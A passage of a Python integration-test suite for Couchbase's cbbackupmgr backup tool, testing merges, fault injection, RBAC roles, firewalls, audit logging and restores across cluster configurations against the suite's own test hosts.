self.backupset.start = randrange(1, self.backupset.number_of_backups)
self.backupset.end = randrange(self.backupset.start,
self.backupset.number_of_backups + 1)
self.merged = True
result, output, _ = self.backup_merge()
self.backupset.end -= 1
status, output, message = self.backup_list()
if not status:
self.fail(message)
current_vseqno = self.get_vbucket_seqnos(self.cluster_to_backup, self.buckets,
self.skip_consistency, self.per_node)
self.log.info("*** Start to validate data in merge backup ")
self.validate_backup_data(self.backupset.backup_host, [self.master],
"ent-backup", False, False, "memory",
self.num_items, "ent-backup1")
self.backup_cluster_validate(skip_backup=True)
def test_merge_backup_with_merge_kill_and_re_merge(self):
"""
1. Create a bucket A
2. Load docs
3. Do backup
4. Load docs
5. Do backup
6. Merge backup
7. Kill merge process
8. Merge backup again
Result: 2nd merge should run ok
"""
gen = BlobGenerator("ent-backup1", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=self.backupset.number_of_backups)
status, output, message = self.backup_list()
if not status:
self.fail(message)
self.log.info("Start to merge backup")
self.backupset.start = randrange(1, self.backupset.number_of_backups)
self.backupset.end = 2
self.merged = True
merge_threads = []
merge_thread = Thread(target=self.backup_merge)
merge_threads.append(merge_thread)
merge_thread.start()
merge_kill_thread = Thread(target=self._kill_cbbackupmgr)
merge_threads.append(merge_kill_thread)
merge_kill_thread.start()
for merge_thread in merge_threads:
merge_thread.join()
status, output, message = self.backup_list()
if not status:
self.fail(message)
result, output, _ = self.backup_merge()
status, output, message = self.backup_list()
if not status:
self.fail(message)
def test_merge_backup_with_partial_backup(self):
"""
1. Create a bucket A
2. Load docs
3. Do backup
4. Load docs
5. Do backup and kill backup process
6. Merge backup. Merge should fail
"""
gen = BlobGenerator("ent-backup1", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=self.backupset.number_of_backups)
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_threads = []
backup_thread = Thread(target=self.backup_cluster)
backup_threads.append(backup_thread)
backup_thread.start()
backup_kill_thread = Thread(target=self._kill_cbbackupmgr)
backup_threads.append(backup_kill_thread)
backup_kill_thread.start()
for backup_thread in backup_threads:
backup_thread.join()
self.backupset.number_of_backups += 1
self.log.info("Start to merge backup")
self.backupset.start = randrange(1, self.backupset.number_of_backups)
self.backupset.end = 3
self.merged = True
status, output, _ = self.backup_merge()
if status:
self.fail("This merge should fail due to last backup killed, not complete yet")
elif "Error merging data: Unable to merge" in output[0]:
self.log.info("Test failed as expected as last backup failed to complete")
status, output, message = self.backup_list()
if not status:
self.fail(message)
def _kill_cbbackupmgr(self):
"""
kill all cbbackupmgr processes
"""
self.sleep(1, "times need for cbbackupmgr process run")
shell = RemoteMachineShellConnection(self.backupset.backup_host)
if self.os_name != "windows":
cmd = "ps aux | grep cbbackupmgr | gawk '{print $2}' | xargs kill -9"
output, _ = shell.execute_command(cmd)
else:
cmd = "tasklist | grep cbbackupmgr | gawk '{printf$2}'"
output, _ = shell.execute_command(cmd)
if output:
kill_cmd = "taskkill /F /T /pid %d " % int(output[0])
output, _ = shell.execute_command(kill_cmd)
if output and "SUCCESS" not in output[0]:
self.fail("Failed to kill cbbackupmgr on windows")
shell.disconnect()
def test_merge_backup_with_purge_deleted_keys(self):
"""
1. Load 100K docs to a bucket A with key 1
2. Delete 50K docs from bucket A
3. Load 50K docs with key 2 to bucket A
4. Take backup
5. Run compaction on each vbucket to purge all delete keys
6. Load again 25K docs with key 3
7. Run backup again
8. Load another 25K docs with key 4
9. Run backup. It should not fail
"""
self.log.info("Load 1st batch docs")
create_gen1 = BlobGenerator("ent-backup1", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, create_gen1, "create", 0)
self.log.info("Delete half docs of 1st batch")
delete_gen = BlobGenerator("ent-backup1", "ent-backup-", self.value_size,
end=self.num_items / 2)
self._load_all_buckets(self.master, delete_gen, "delete", 0)
self.log.info("Load 2nd batch docs")
create_gen2 = BlobGenerator("ent-backup2", "ent-backup-", self.value_size,
end=self.num_items / 2)
self._load_all_buckets(self.master, create_gen2, "create", 0)
self.log.info("Start backup")
self.backup_create()
self.backup_cluster()
nodes = []
upto_seq = 100000
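        # Sequence number up to which compaction may purge tombstones;
        # presumably chosen to comfortably cover the mutations loaded above.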
self.log.info("Start compact each vbucket in bucket")
rest = RestConnection(self.master)
cluster_nodes = rest.get_nodes()
for bucket in RestConnection(self.master).get_buckets():
found = self.get_info_in_database(self.backupset.cluster_host, bucket, "deleted")
if found:
shell = RemoteMachineShellConnection(self.backupset.cluster_host)
shell.compact_vbuckets(len(bucket.vbuckets), cluster_nodes, upto_seq)
shell.disconnect()
found = self.get_info_in_database(self.backupset.cluster_host, bucket, "deleted")
if not found:
self.log.info("Load another docs to bucket %s " % bucket.name)
create_gen3 = BlobGenerator("ent-backup3", "ent-backup-", self.value_size,
end=self.num_items / 4)
self._load_bucket(bucket, self.master, create_gen3, "create",
self.expire_time)
self.backup_cluster()
create_gen4 = BlobGenerator("ent-backup3", "ent-backup-", self.value_size,
end=self.num_items / 4)
self._load_bucket(bucket, self.master, create_gen4, "create",
self.expire_time)
self.backup_cluster()
self.backupset.end = 3
status, output, message = self.backup_merge()
if not status:
self.fail(message)
else:
self.fail("cbcompact failed to purge deleted key")
def test_merge_backup_with_failover_logs(self):
"""
1. Load 100K docs into bucket.
2. Wait for all docs persisted.
3. Stop persistence.
4. Load another 100K docs to bucket.
5. Kill memcached will generate about 4 failover logs.
./cbstats localhost:mc_port -u username -p pass failovers | grep num_entries
6. Take backup.
7. Load another 100K docs
8. Take backup again.
Verify:
Only 1st backup is full backup
All backup after would be incremental backup
In 4.5.1, all backups would be full backup
"""
self.log.info("Load 1st batch docs")
create_gen1 = BlobGenerator("ent-backup1", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, create_gen1, "create", 0)
failed_persisted_bucket = []
rest = RestConnection(self.master)
cluster_nodes = rest.get_nodes()
for bucket in self.buckets:
ready = RebalanceHelper.wait_for_stats_on_all(self.backupset.cluster_host,
bucket.name, 'ep_queue_size',
0, timeout_in_seconds=120)
if not ready:
failed_persisted_bucket.append(bucket.name)
if failed_persisted_bucket:
self.fail("Buckets %s did not persisted." % failed_persisted_bucket)
self.log.info("Stop persistence at each node")
clusters = copy.deepcopy(cluster_nodes)
shell = RemoteMachineShellConnection(self.backupset.backup_host)
for bucket in self.buckets:
for node in clusters:
shell.execute_command("%scbepctl%s %s:%s -b %s stop" % \
(self.cli_command_location,
self.cmd_ext,
node.ip,
constants.memcached_port,
bucket.name))
shell.disconnect()
self.log.info("Load 2nd batch docs")
create_gen2 = BlobGenerator("ent-backup2", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, create_gen2, "create", 0)
self.sleep(5)
self.log.info("Crash cluster via kill memcached")
for node in clusters:
for server in self.servers:
if node.ip == server.ip:
num_entries = 4
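                    # Keep killing memcached until cbstats reports enough
                    # failover-log entries (the grep below accepts 4-7).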
reach_num_entries = False
while not reach_num_entries:
shell = RemoteMachineShellConnection(server)
shell.kill_memcached()
ready = False
while not ready:
if not RestHelper(RestConnection(server)).is_ns_server_running():
self.sleep(10)
else:
ready = True
cmd = "%scbstats%s %s:%s failovers -u %s -p %s | grep num_entries " \
"| gawk%s '{printf $2}' | grep -m 5 '4\|5\|6\|7'" \
% (self.cli_command_location, self.cmd_ext,
server.ip, constants.memcached_port,
"cbadminbucket", "password", self.cmd_ext)
output, error = shell.execute_command(cmd)
shell.disconnect()
if output:
self.log.info("Number failover logs entries reached. %s" % output)
reach_num_entries = True
self.backup_create()
self.log.info("Start backup data")
self.backup_cluster()
status, output, message = self.backup_list()
if not status:
self.fail(message)
self.log.info("Load 3rd batch docs")
create_gen3 = BlobGenerator("ent-backup3", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, create_gen3, "create", 0)
self.backup_cluster()
status, output, message = self.backup_list()
if not status:
self.fail(message)
def test_backupmgr_with_short_option(self):
"""
Test short option flags at each option
"""
cmd = "%scbbackupmgr%s " % (self.cli_command_location, self.cmd_ext)
cmd += "%s " % self.input.param("command", "backup")
options = " -%s %s " % (self.input.param("repo", "-repo"),
self.backupset.name)
options += " -%s %s" % (self.input.param("archive", "-archive"),
self.backupset.directory)
if self.input.param("command", "backup") != "list":
options += " -%s http://%s:%s" % (self.input.param("cluster", "-cluster"),
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port)
options += " -%s Administrator" % self.input.param("bkusername", "-username")
options += " -%s password" % self.input.param("bkpassword", "-password")
self.backup_create()
shell = RemoteMachineShellConnection(self.backupset.backup_host)
output, error = shell.execute_command("%s %s " % (cmd, options))
shell.log_command_output(output, error)
shell.disconnect()
if error:
self.fail("There is a error in %s " % error)
def test_backupmgr_help_display(self):
"""
Test display help manual in each option
We do not test compare the whole content but only
few first lines to make sure manual page displayed.
"""
display_option = self.input.param("display", "-h")
if self.input.param("subcommand", None) is None:
subcommand = ""
else:
subcommand = self.input.param("subcommand", None)
cmd = "%scbbackupmgr%s " % (self.cli_command_location, self.cmd_ext)
if display_option == "--help":
display_option = self.long_help_flag
elif display_option == "-h":
self.long_help_flag = self.short_help_flag
cmd += " %s %s " % (subcommand, display_option)
shell = RemoteMachineShellConnection(self.backupset.cluster_host)
output, error = shell.execute_command("%s " % (cmd))
self.log.info("Verify print out help message")
if display_option == "-h":
if subcommand == "":
content = ['cbbackupmgr [<command>] [<args>]', '',
' backup Backup a Couchbase cluster']
elif subcommand == "help":
content = ['cbbackupmgr help [<command>] [<args>]', '',
' archivelayout View the archive directory layout structure']
else:
content = ['cbbackupmgr %s [<args>]' % subcommand, '',
'Required Flags:']
self.validate_help_content(output[:3], content)
elif display_option == "--help":
content = None
if subcommand == "":
content = \
['CBBACKUPMGR(1) Backup Manual CBBACKUPMGR(1)']
self.validate_help_content(output, content)
else:
subcmd_cap = subcommand.upper()
content = \
['CBBACKUPMGR-%s(1) Backup Manual CBBACKUPMGR-%s(1)'
% (subcmd_cap, subcmd_cap)]
self.validate_help_content(output, content)
shell.disconnect()
def test_backup_restore_with_optional_flags(self):
"""
1. Create a bucket
2. Load docs to bucket
3. Backup with optional flags like no-ssl-verify, secure-conn
4. Verify backup data in backup file
"""
self.log.info("Load 1st batch docs")
create_gen1 = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, create_gen1, "create", 0)
self.backup_create()
verify_data = True
output, error = self.backup_cluster()
if self.backupset.secure_conn:
if self.backupset.bk_no_cert:
if self._check_output("Backup successfully completed", output):
self.fail("Taking cluster backup failed.")
elif self._check_output("Error", output):
verify_data = False
else:
if not self._check_output("Backup successfully completed", output):
self.fail("Taking cluster backup failed.")
if verify_data:
self.validate_backup_data(self.backupset.backup_host,
self.servers[:self.nodes_init],
"ent-backup", False, False, "memory",
self.num_items, None)
if self.do_restore:
self.log.info("Restore with secure connection")
self.backup_restore()
def test_restore_with_filter_regex(self):
"""
1. Create a bucket
2. Load docs to bucket with key patterned
3. Backup docs
4. Delete bucket
5. Restore docs with regex
6. Verify only key or value in regex restored to bucket
"""
key_name = "ent-backup"
if self.backupset.random_keys:
key_name = "random_keys"
self.validate_keys = self.input.param("validate_keys", False)
if self.validate_keys:
gen = BlobGenerator(key_name, "ent-backup-", self.value_size,
end=self.num_items)
else:
gen = DocumentGenerator('random_keys', '{{"age": {0}}}', xrange(100),
start=0, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.log.info("Start backup")
self.backup_create()
self.backup_cluster()
self.backup_restore()
self.merged = False
regex_check = self.backupset.filter_keys
if not self.backupset.filter_keys:
regex_check = self.backupset.filter_values
self.validate_backup_data(self.backupset.backup_host,
[self.backupset.restore_cluster_host],
key_name, False, False, "memory",
self.num_items, None,
validate_keys=self.validate_keys,
regex_pattern=regex_check)
def test_backup_with_rbac(self):
"""
1. Create a cluster
2. Create a bucket and load date
3. Create a user with specific role
param in conf: new_user
param in conf: new_role
Roles:
admin, ro_admin, cluster_admin, bucket_full_access[*], bucket_admin[*],
views_admin[*],
replication_admin, roadmin_no_access, cluster_admin_no_access,
bucket_admin_no_access, view_admin_no_access, replication_admin_no_access,
view_replication_admin, replication_ro_admin, bucket_view_replication_admin,
4. Run backup with new user created
5. Verify if backup command handles user role correctly
"""
all_buckets = self.input.param("all_buckets", False)
if self.create_fts_index:
gen = DocumentGenerator('test_docs', '{{"age": {0}}}', xrange(100), start=0,
end=self.num_items)
index_definition = INDEX_DEFINITION
index_name = index_definition['name'] = "age"
rest_fts = RestConnection(self.master)
try:
self.log.info("Create fts index")
rest_fts.create_fts_index(index_name, index_definition)
            except Exception as ex:
self.fail(ex)
else:
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
if self.create_views:
self._create_views()
self.backup_create()
if all_buckets:
self.cluster_new_role = self.cluster_new_role + "[*]"
self.log.info("\n***** Create new user: %s with role: %s to do backup *****"
% (self.cluster_new_user, self.cluster_new_role))
testuser = [{"id": "%s" % self.cluster_new_user,
"name": "%s" % self.cluster_new_user,
"password": "password"}]
rolelist = [{"id": "%s" % self.cluster_new_user,
"name": "%s" % self.cluster_new_user,
"roles": "%s" % self.cluster_new_role}]
users_can_backup_all = ["admin", "bucket_full_access[*]",
"data_backup[*]"]
users_can_not_backup_all = ["views_admin[*]", "replication_admin",
"replication_target[*]", "data_monitoring[*]",
"data_writer[*]", "data_reader[*]",
"data_dcp_reader[*]", "fts_searcher[*]",
"fts_admin[*]", "query_manage_index[*]",
"ro_admin", "bucket_admin[*]", "cluster_admin"]
try:
status = self.add_built_in_server_user(testuser, rolelist)
if not status:
self.fail("Fail to add user: %s with role: %s " \
% (self.cluster_new_user,
self.cluster_new_role))
output, error = self.backup_cluster()
success_msg = 'Backup successfully completed'
fail_msg = "Error backing up cluster:"
if self.cluster_new_role in users_can_backup_all:
if not self._check_output(success_msg, output):
self.fail("User %s failed to backup data.\n"
"Here is the output %s " % \
(self.cluster_new_role, output))
elif self.cluster_new_role in users_can_not_backup_all:
if not self._check_output(fail_msg, output):
self.fail("cbbackupmgr failed to block user to backup")
status, _, message = self.backup_list()
if not status:
self.fail(message)
if self.do_verify:
current_vseqno = self.get_vbucket_seqnos(self.cluster_to_backup,
self.buckets,
self.skip_consistency,
self.per_node)
self.log.info("*** Start to validate data in merge backup ")
result = self.validate_backup_data(self.backupset.backup_host,
[self.master],
"ent-backup", False, False, "memory",
self.num_items, None)
self.validate_backup_views()
except Exception as e:
if e:
print "Exception error: ", e
if self.cluster_new_role in users_can_not_backup_all:
error_found = False
error_messages = ["Error backing up cluster: Forbidden",
"Could not find file shard_0.fdb",
"Error backing up cluster: Invalid permissions",
"Database file is empty",
"Error backing up cluster: Unable to find the latest vbucket"]
if self.do_verify:
if str(e) in error_messages:
error_found = True
if not error_found:
raise Exception("cbbackupmgr does not block user role: %s to backup" \
% self.cluster_new_role)
if self.cluster_new_role == "views_admin[*]" and self.create_views:
status, mesg = self.validate_backup_views(self.backupset.backup_host)
if not status:
raise Exception(mesg)
if "Expected error message not thrown" in str(e):
raise Exception("cbbackupmgr does not block user role: %s to backup" \
% self.cluster_new_role)
if self.cluster_new_role in users_can_backup_all:
if not self._check_output(success_msg, output):
self.fail(e)
finally:
self.log.info("Delete new create user: %s " % self.cluster_new_user)
shell = RemoteMachineShellConnection(self.backupset.backup_host)
curl_path = ""
if self.os_name == "windows":
curl_path = self.cli_command_location
cmd = "%scurl%s -g -X %s -u %s:%s http://%s:8091/settings/rbac/users/local/%s" \
% (curl_path,
self.cmd_ext,
"DELETE",
self.master.rest_username,
self.master.rest_password,
self.backupset.cluster_host.ip,
self.cluster_new_user)
output, error = shell.execute_command(cmd)
shell.disconnect()
def test_restore_with_rbac(self):
"""
1. Create a backupdata set.
2. Setup cluster.
3. Restore data back to cluster
Important:
        This test needs to copy entbackup.zip and entbackup-fts.zip
to /root or /cygdrive/c/Users/Administrator in backup host.
Files location: 172.23.121.227:/root/entba*.zip
"""
all_buckets = self.input.param("all_buckets", False)
self.log.info("Copy backup dataset to tmp dir")
shell = RemoteMachineShellConnection(self.backupset.backup_host)
shell.execute_command("rm -rf %s " % self.backupset.directory)
fts = ""
backup_file = ENT_BKRS
if self.create_fts_index:
backup_file = ENT_BKRS_FTS
fts = "-fts"
backup_dir_found = False
backup_dir = "entbackup" + fts
output, error = shell.execute_command("ls | grep entbackup")
self.log.info("check if %s dir exists on this server " % backup_dir)
if output:
for x in output:
if x == backup_dir:
backup_dir_found = True
if not backup_dir_found:
self.log.info("%s dir does not exist on this server. Downloading.. "
% backup_dir)
shell.execute_command("%s -q %s --no-check-certificate " % (self.wget, backup_file))
shell.execute_command("tar -zxvf %s.tgz " % backup_dir)
if "-" in self.cluster_new_role:
self.cluster_new_role = self.cluster_new_role.replace("-", ",")
shell.check_cmd("unzip")
shell.execute_command("cp -r entbackup%s %s/entbackup" % (fts, self.tmp_path))
output, error = shell.execute_command("cd %s/backup/*/*/data; " \
"unzip shar*.zip" \
% self.backupset.directory)
shell.log_command_output(output, error)
shell.execute_command("echo '' > {0}/logs/backup.log" \
.format(self.backupset.directory))
shell.disconnect()
status, _, message = self.backup_list()
if not status:
self.fail(message)
self.log.info("Restore data from backup files")
if all_buckets:
self.cluster_new_role = self.cluster_new_role + "[*]"
self.log.info("\n***** Create new user: %s with role: %s to do backup *****"
% (self.cluster_new_user, self.cluster_new_role))
testuser = [{"id": "%s" % self.cluster_new_user,
"name": "%s" % self.cluster_new_user,
"password": "password"}]
rolelist = [{"id": "%s" % self.cluster_new_user,
"name": "%s" % self.cluster_new_user,
"roles": "%s" % self.cluster_new_role}]
try:
status = self.add_built_in_server_user(testuser, rolelist)
if not status:
self.fail("Fail to add user: %s with role: %s " \
% (self.cluster_new_user,
self.cluster_new_role))
users_can_restore_all = ["admin", "bucket_full_access[*]",
"data_backup[*]"]
users_can_not_restore_all = ["views_admin[*]", "ro_admin",
"replication_admin", "data_monitoring[*]",
"data_writer[*]", "data_reader[*]",
"data_dcp_reader[*]", "fts_searcher[*]",
"fts_admin[*]", "query_manage_index[*]",
"replication_target[*]", "cluster_admin",
"bucket_admin[*]"]
if self.cluster_new_role in users_can_not_restore_all:
self.should_fail = True
output, error = self.backup_restore()
success_msg = 'Restore completed successfully'
fail_msg = "Error restoring cluster:"
failed_persisted_bucket = []
ready = RebalanceHelper.wait_for_stats_on_all(self.backupset.cluster_host,
"default", 'ep_queue_size',
0, timeout_in_seconds=120)
if not ready:
failed_persisted_bucket.append("default")
if failed_persisted_bucket:
self.fail("Buckets %s did not persisted." % failed_persisted_bucket)
self.sleep(3)
rest = RestConnection(self.master)
actual_keys = rest.get_active_key_count("default")
print "\nActual keys in default bucket: %s \n" % actual_keys
if self.cluster_new_role in users_can_restore_all:
if not self._check_output(success_msg, output):
self.fail("User with roles: %s failed to restore data.\n"
"Here is the output %s " % \
(self.cluster_new_role, output))
roles = []
if "," in self.cluster_new_role:
roles = self.cluster_new_role.split(",")
if set(roles) & set(users_can_not_restore_all) and \
set(roles) & set(users_can_restore_all):
if not self._check_output(success_msg, output):
self.fail("User: %s failed to restore data with roles: %s. " \
"Here is the output %s " % \
(self.cluster_new_user, roles, output))
if int(actual_keys) != 1000:
self.fail("User: %s failed to restore data with roles: %s. " \
"Here is the actual docs in bucket %s " % \
(self.cluster_new_user, roles, actual_keys))
elif self.cluster_new_role in users_can_not_restore_all:
if int(actual_keys) == 1000:
self.fail("User: %s with role: %s should not allow to restore data" \
% (self.cluster_new_user,
self.cluster_new_role))
if not self._check_output(fail_msg, output):
self.fail("cbbackupmgr failed to block user to restore")
finally:
self.log.info("Delete new create user: %s " % self.cluster_new_user)
shell = RemoteMachineShellConnection(self.backupset.backup_host)
curl_path = ""
if self.os_name == "windows":
curl_path = self.cli_command_location
cmd = "%scurl%s -g -X %s -u %s:%s http://%s:8091/settings/rbac/users/local/%s" \
% (curl_path,
self.cmd_ext,
"DELETE",
self.master.rest_username,
self.master.rest_password,
self.backupset.cluster_host.ip,
self.cluster_new_user)
output, error = shell.execute_command(cmd)
shell.disconnect()
def test_backup_restore_with_nodes_reshuffle(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
        2. Lists the default zone of the current cluster - backs up the cluster and validates
3. Creates a new zone - shuffles cluster host to new zone
4. Restores to cluster host and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
rest_conn = RestConnection(self.backupset.cluster_host)
zones = rest_conn.get_zone_names().keys()
source_zone = zones[0]
target_zone = "test_backup_restore"
self.log.info("Current nodes in group {0} : {1}".format(source_zone,
str(rest_conn.get_nodes_in_zone(source_zone).keys())))
self.log.info("Taking backup with current groups setup")
self.backup_create()
self.backup_cluster_validate()
self.log.info("Creating new zone " + target_zone)
rest_conn.add_zone(target_zone)
self.log.info("Moving {0} to new zone {1}".format(self.backupset.cluster_host.ip, target_zone))
rest_conn.shuffle_nodes_in_zones(["{0}".format(self.backupset.cluster_host.ip)], source_zone, target_zone)
self.log.info("Restoring to {0} after group change".format(self.backupset.cluster_host.ip))
try:
self.backup_restore_validate()
except Exception as ex:
self.fail(str(ex))
finally:
self.log.info("Moving {0} back to old zone {1}".format(self.backupset.cluster_host.ip, source_zone))
rest_conn.shuffle_nodes_in_zones(["{0}".format(self.backupset.cluster_host.ip)], target_zone, source_zone)
self.log.info("Deleting new zone " + target_zone)
rest_conn.delete_zone(target_zone)
def test_backup_restore_with_firewall(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates backupset on backup host
3. Enables firewall on cluster host and validates if backup cluster command throws expected error
4. Disables firewall on cluster host, takes backup and validates
5. Enables firewall on restore host and validates if backup restore command throws expected error
6. Disables firewall on restore host, restores and validates
"""
if self.os_name == "windows" or self.nonroot:
self.log.info("This firewall test does not run on windows or nonroot user")
return
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.log.info("Enabling firewall on cluster host before backup")
RemoteUtilHelper.enable_firewall(self.backupset.cluster_host)
self.enable_firewall = True
try:
output, error = self.backup_cluster()
self.assertTrue(self._check_output("getsockopt: connection refused", output),
"Expected error not thrown by backup cluster when firewall enabled")
finally:
self.log.info("Disabling firewall on cluster host to take backup")
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.disable_firewall()
conn.disconnect()
self.enable_firewall = False
self.log.info("Trying backup now")
self.backup_cluster_validate()
self.log.info("Enabling firewall on restore host before restore")
RemoteUtilHelper.enable_firewall(self.backupset.restore_cluster_host)
self.enable_firewall = True
""" reset restore cluster to same services as backup cluster """
try:
output, error = self.backup_restore()
mesg = "getsockopt: connection refused"
if self.skip_buckets:
mesg = "Error restoring cluster:"
self.assertTrue(self._check_output(mesg, output),
"Expected error not thrown by backup restore when firewall enabled")
finally:
self.log.info("Disabling firewall on restore host to restore")
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.disable_firewall()
conn.disconnect()
self.enable_firewall = False
self.log.info("Trying restore now")
self.skip_buckets = False
""" Need to reset restore node with services the same as in backup cluster """
rest = RestConnection(self.backupset.restore_cluster_host)
rest.force_eject_node()
master_services = self.get_services([self.backupset.cluster_host],
self.services_init, start_node=0)
info = rest.get_nodes_self()
if info.memoryQuota and int(info.memoryQuota) > 0:
self.quota = info.memoryQuota
rest.init_node()
self.sleep(10)
self.backup_restore_validate()
def test_backup_restore_with_audit(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates backupset on backup host
3. Creates a backup of the cluster host - verifies if corresponding entry was created in audit log
4. Restores data on to restore host - verifies if corresponding entry was created in audit log
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
audit_obj = audit(AUDITBACKUPID, self.backupset.cluster_host)
status = audit_obj.getAuditStatus()
self.log.info("Audit status on {0} is {1}".format(self.backupset.cluster_host.ip, status))
if not status:
self.log.info("Enabling audit on {0}".format(self.backupset.cluster_host.ip))
audit_obj.setAuditEnable('true')
self.backup_create()
self.backup_cluster()
field_verified, value_verified = audit_obj.validateEvents(self._get_event_expected_results(action='backup'))
self.assertTrue(field_verified, "One of the fields is not matching")
self.assertTrue(value_verified, "Values for one of the fields is not matching")
audit_obj = audit(AUDITBACKUPID, self.backupset.restore_cluster_host)
status = audit_obj.getAuditStatus()
self.log.info("Audit status on {0} is {1}".format(self.backupset.restore_cluster_host.ip, status))
if not status:
self.log.info("Enabling audit on {0}".format(self.backupset.restore_cluster_host.ip))
audit_obj.setAuditEnable('true')
self.backup_restore()
audit_obj = audit(AUDITRESTOREID, self.backupset.restore_cluster_host)
field_verified, value_verified = audit_obj.validateEvents(self._get_event_expected_results(action='restore'))
self.assertTrue(field_verified, "One of the fields is not matching")
self.assertTrue(value_verified, "Values for one of the fields is not matching")
def _get_event_expected_results(self, action):
if action == 'backup':
expected_results = {
"real_userid:source": "memcached",
"real_userid:user": "default",
"name": "opened DCP connection",
"id": AUDITBACKUPID,
"description": "opened DCP connection",
"timestamp": "{0}".format(self.backups[0]),
"bucket": "{0}".format(self.buckets[0].name),
"sockname": "%s:%s" % (self.backupset.cluster_host.ip,
constants.memcached_port),
"peername": "{0}".format(self.backupset.backup_host.ip)
}
elif action == 'restore':
expected_results = {
"real_userid:source": "memcached",
"real_userid:user": "default",
"name": "authentication succeeded",
"id": AUDITRESTOREID,
"description": "Authentication to the cluster succeeded",
"timestamp": "{0}".format(self.backups[0]),
"bucket": "{0}".format(self.buckets[0].name),
"sockname": "%s:%s" % (self.backupset.restore_cluster_host.ip,
constants.memcached_port),
"peername": "{0}".format(self.backupset.backup_host.ip)
}
return expected_results
def test_backup_restore_with_lesser_nodes(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
        2. Adds another node to the restore cluster and rebalances - note the test has to be run with nodes_init >= 3 so
           that the cluster host has more nodes than the restore host
3. Creates backupset on backup host
4. Creates backup of cluster host with 3 or more number of nodes and validates
5. Restores to restore host with lesser number of nodes (2) and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.add_node(self.input.clusters[0][1].rest_username, self.input.clusters[0][1].rest_password,
self.input.clusters[0][1].ip)
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, [], [])
rebalance.result()
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate()
def test_backup_with_full_disk(self):
"""
Things to be done before running this testcase:
- scripts/install.py has to be run with init_nodes=False
- scripts/cbqe3043.py has to be run against the ini file - this script will mount a 20MB partition on the
nodes required for the test
1. Creates specified bucket on the cluster and loads it with given number of items
2. Sets backup directory to the 20MB partition and creates a backupset
3. Fills up 20MB partition
        4. Keeps taking backups until a 'no space left on device' error is hit
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backupset.directory = "/cbqe3043/entbackup"
self.backup_create()
conn = RemoteMachineShellConnection(self.backupset.backup_host)
output, error = conn.execute_command("dd if=/dev/zero of=/cbqe3043/file bs=18M count=1")
conn.log_command_output(output, error)
output, error = self.backup_cluster()
while self._check_output("Backup successfully completed", output):
output, error = self.backup_cluster()
error_msg = "Error backing up cluster: Unable to read data because range.json is corrupt,"
self.assertTrue(self._check_output(error_msg, output),
"Expected error message not thrown by backup when disk is full")
self.log.info("Expected error thrown by backup command")
conn.execute_command("rm -rf /cbqe3043/file")
conn.disconnect()
def test_backup_and_restore_with_map_buckets(self):
"""
1. Creates specified buckets on the cluster and loads it with given number
of items - memcached bucket has to be created for this test
(memcached_buckets=1)
2. Creates a backupset, takes backup of the cluster host and validates
3. Executes list command on the backup and validates that memcached bucket
has been skipped
4. Restores the backup and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
if self.create_gsi:
self.create_indexes()
self.backup_create()
self.backup_cluster()
status, output, message = self.backup_list()
if not status:
self.fail("Getting backup list to validate memcached buckets failed.")
for line in output:
self.assertTrue("memcached_bucket0" not in line,
"Memcached bucket found in backup list output after backup")
self.log.info("Memcached bucket not found in backup list output after backup as expected")
self.backup_restore()
if self.create_gsi:
self.verify_gsi()
def test_backup_with_erlang_crash_and_restart(self):
"""
1. Creates specified bucket on the cluster and loads it with given number
of items
2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills and restarts
erlang process
4. Validates backup output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
backup_result = self.cluster.async_backup_cluster(cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory, name=self.backupset.name,
resume=self.backupset.resume, purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.kill_erlang()
conn.start_couchbase()
output = backup_result.result(timeout=200)
self.assertTrue(self._check_output("Backup successfully completed", output),
"Backup failed with erlang crash and restart within 180 seconds")
self.log.info("Backup succeeded with erlang crash and restart within 180 seconds")
conn.disconnect()
def test_backup_with_couchbase_stop_and_start(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
